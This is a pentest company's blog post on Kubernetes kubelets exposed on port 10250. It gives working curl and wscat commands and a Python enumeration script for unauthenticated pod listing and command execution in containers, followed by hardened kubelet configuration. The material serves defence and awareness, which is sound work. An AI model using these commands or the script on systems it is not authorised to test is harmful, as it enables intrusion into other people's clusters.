Beware of Exposed Kubernetes API

With new technology comes new vulnerabilities. If a developer isn’t careful, they could easily end up exposing the Kubernetes API to the world, allowing remote attackers in.

Alex Thomas

September 9, 2021

Introduction

With the rise of Docker, new technologies are bound to be designed around the concept of containers. Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google.

Exposed Kubernetes API

As convenient as Kubernetes is, it has a drawback. Port 10250 is the kubelet's HTTPS API, which runs on every node (this is not the kube-apiserver, which normally listens on 6443). Whether it demands credentials depends on how the kubelet was started: with anonymous authentication enabled and the authorization mode set to AlwaysAllow, anyone who can reach the port can list the node's pods and execute commands in its containers. If operators aren't careful, that port ends up reachable from the Internet. A quick Shodan search for port 10250 turns up many such services.

Once a kubelet answering on 10250 is found, the first step is to list the pods it runs by sending a GET request to the /pods endpoint. The server responds with a PodList like the following (trimmed here to a single pod):

{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {},
  "items": [
    {
      "metadata": {
        "name": "pushgateway-5fc955dd8d-674qn",
        "generateName": "pushgateway-5fc955dd8d-",
        "namespace": "monitoring",
        "selfLink": "/api/v1/namespaces/monitoring/pods/pushgateway-5fc955dd8d-674qn",
        "uid": "d554e035-b759-11e9-814c-525400bdacd2",
        "resourceVersion": "9594",
        "creationTimestamp": "2019-08-05T08:20:07Z",
        "labels": {
          "app": "pushgateway",
          "pod-template-hash": "1975118848",
          "prophet.4paradigm.com/deployment": "pushgateway"
        },
        "annotations": {
          "kubernetes.io/config.seen": "2019-08-05T16:20:07.080938229+08:00",
          "kubernetes.io/config.source": "api",
          "kubernetes.io/created-by": "{\"kind\":\"SerializedReference\",\"apiVersion\":\"v1\",\"reference\":{\"kind\":\"ReplicaSet\",\"namespace\":\"monitoring\",\"name\":\"pushgateway-5fc955dd8d\",\"uid\":\"d552bfb3-b759-11e9-814c-525400bdacd2\",\"apiVersion\":\"extensions\",\"resourceVersion\":\"9591\"}}\n"
        },
        "ownerReferences": [
          {
            "apiVersion": "extensions/v1beta1",
            "kind": "ReplicaSet",
            "name": "pushgateway-5fc955dd8d",
            "uid": "d552bfb3-b759-11e9-814c-525400bdacd2",
            "controller": true,
            "blockOwnerDeletion": true
          }
        ]
      },
      "spec": {
        "volumes": [
          {
            "name": "default-token-qgm5l",
            "secret": {
              "secretName": "default-token-qgm5l",
              "defaultMode": 420
            }
          }
        ],
        "containers": [
          {
            "name": "pushgateway",
            "image": "10.10.0.15:35000/prom/pushgateway:v0.4.1",
            "ports": [
              {
                "name": "http",
                "containerPort": 9091,
                "protocol": "TCP"
              }
            ]
          }
        ]
      }
    }
  ]
}

From this response we get the three names an exec request needs: the namespace, the pod name, and the container name:

  • Namespace
    • monitoring
  • Pod Name
    • pushgateway-5fc955dd8d-674qn
  • Container Name
    • pushgateway

With this information it is possible to ask the kubelet to execute a command inside a container, which is the same operation kubectl exec performs. Send the following request (a POST that upgrades the connection to a SPDY stream; substitute the address of the kubelet and the namespace, pod and container names gathered above):

curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -H "Connection: upgrade" -H "Upgrade: SPDY/3.1" -X POST "https://<ip>:<port>/exec/<namespace>/<pod>/<container>/?command=<command>&input=1&output=1&tty=1"

If the kubelet accepts the request, its response carries a Location header pointing at the streaming endpoint it created for the new exec session; the command's input and output are exchanged over a WebSocket at that path. Note the Location header value. In the captured response it was /cri/exec/Bwak7x7h.

To talk to that WebSocket endpoint, use the tool wscat. On Debian and Ubuntu it is packaged as node-ws and can be installed with:

apt-get install node-ws

Now take the Location header value noted earlier and connect to it to collect the command output (the path after the host is the Location value, here /cri/exec/<token> where <token> is the last path component; --no-check skips certificate verification, just as --insecure did for curl):

wscat -c "wss://<ip>:<port>/cri/exec/<token>" --no-check

Once the connection is open, the output of the command arrives over the WebSocket. In the captured session the command was id, and its output showed the uid, gid and groups of the process inside the container. That is remote code execution inside the container, and at no step were any credentials required.
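The enumeration part of the procedure above (the unauthenticated GET /pods, extracting the namespace, pod and container names, and building the exec URL the curl request posts to) as a script. This is an added example, not code from the original post. It probes one host, accepts the kubelet's self-signed certificate, treats a 401 or 403 as "locked down", and turns the pod list into exec URLs; the PodList it demonstrates on is a constructed sample modelled on the response shown earlier with a hypothetical second pod added, and the host 10.0.0.5 is a placeholder, not a real target. The exec request itself and the WebSocket stream are left to curl and wscat as described above.

```python
"""Enumerate an exposed kubelet (port 10250) and build exec URLs for its containers.

Added example, not code from the original post. The PodList below is a
constructed sample shaped like the response in the article; the host,
port and second pod are placeholders.
"""
import json
import ssl
import urllib.error
import urllib.request
from urllib.parse import quote

# Constructed sample, trimmed to the fields the procedure actually uses.
SAMPLE_PODLIST = json.dumps({
    "kind": "PodList",
    "apiVersion": "v1",
    "items": [
        {"metadata": {"name": "pushgateway-5fc955dd8d-674qn", "namespace": "monitoring"},
         "spec": {"containers": [{"name": "pushgateway"}]}},
        {"metadata": {"name": "web-7d9c4b6f5-abcde", "namespace": "default"},   # hypothetical
         "spec": {"containers": [{"name": "nginx"}, {"name": "log-shipper"}]}},
    ],
})


def parse_podlist(body):
    """Return (namespace, pod, container) for every container in a PodList.

    The kubelet's /pods lists every pod scheduled on that node, including
    ones in system namespaces, so each tuple is a potential exec target.
    """
    doc = json.loads(body)
    if doc.get("kind") != "PodList":
        raise ValueError("unexpected kind: %r" % doc.get("kind"))
    targets = []
    for item in doc.get("items", []):
        meta = item["metadata"]
        # initContainers are listed as well but have normally exited; skip them.
        for container in item.get("spec", {}).get("containers", []):
            targets.append((meta["namespace"], meta["name"], container["name"]))
    return targets


def exec_url(host, port, namespace, pod, container, command):
    """Build the URL the post's curl request POSTs to.

    `command` may be a string or an argv list. The kubelet accepts the
    `command` query parameter repeated once per argument, so passing a list
    preserves argument boundaries instead of relying on shell splitting.
    """
    argv = [command] if isinstance(command, str) else list(command)
    query = "&".join("command=%s" % quote(arg, safe="") for arg in argv)
    return "https://%s:%d/exec/%s/%s/%s?%s&input=1&output=1&tty=1" % (
        host, port, namespace, pod, container, query)


def fetch_pods(host, port=10250, timeout=5):
    """GET /pods with no credentials, accepting the kubelet's self-signed cert.

    Returns the body when the kubelet serves it anonymously, and None when it
    answers 401 (anonymous auth disabled) or 403 (anonymous allowed in but
    authorization enforced), which is what a correctly configured kubelet does.
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request("https://%s:%d/pods" % (host, port))
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        if err.code in (401, 403):
            return None
        raise


def enumerate_targets(host, port=10250):
    """Probe one kubelet and return its exec targets, or [] if it is locked down."""
    body = fetch_pods(host, port)
    return [] if body is None else parse_podlist(body)


if __name__ == "__main__":
    # Offline demonstration against the constructed sample; the host is a placeholder.
    for ns, pod, container in parse_podlist(SAMPLE_PODLIST):
        print(exec_url("10.0.0.5", 10250, ns, pod, container, "id"))
```

Running the script prints one exec URL per container of the sample, ready to be dropped into the curl request; enumerate_targets() does the same against a live host. A None from fetch_pods() is the good outcome when you run this against your own nodes.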

Conclusion

With new technology comes new vulnerabilities. The rise of Docker containers gave birth to Kubernetes. If an operator isn't careful, the kubelet API on port 10250 can end up exposed to the world with anonymous access allowed, and that lets remote attackers execute commands in containers without authenticating.
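The kubelet settings that make the attack above possible, beside the hardened settings, as an added example rather than configuration taken from the original post. Both fragments use the KubeletConfiguration file format; the clientCAFile path is the usual kubeadm location and is an assumption for your cluster.

```yaml
# Exposed: every request is accepted as system:anonymous and every action is
# allowed, so GET /pods and POST /exec/... need no credentials at all.
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: true
authorization:
  mode: AlwaysAllow
readOnlyPort: 10255        # a second, plaintext /pods that is never authenticated
---
# Hardened: anonymous requests get 401; everyone else must present a client
# certificate signed by the cluster CA or a bearer token the API server
# validates, and each action is then checked against RBAC (the "nodes/proxy"
# subresource) by the API server through the authorization webhook.
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: false
  x509:
    clientCAFile: /etc/kubernetes/pki/ca.crt   # assumed kubeadm path
  webhook:
    enabled: true
authorization:
  mode: Webhook
readOnlyPort: 0            # disable the read-only port entirely
```

After restarting the kubelet, curl --insecure https://<node>:10250/pods should answer Unauthorized. Pair this with not exposing 10250 to the Internet at all (host firewall or cloud security group); the kubelet's own authentication is the last line of defence, not the first.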

About Red Sentry

Red Sentry’s continuous external and cloud penetration testing platform allows companies to identify their cyber vulnerabilities 24 hours a day, 365 days a year. The system is automated, agentless, scalable, and easy to use. Pentest reports take minutes rather than weeks and cost a fraction of traditional pentests.

Alex Thomas

CTO, Ethical hacker of numerous Fortune 500 companies. Inventor of cybersecurity tools and published author of two books. Dakota State University BS and MS.

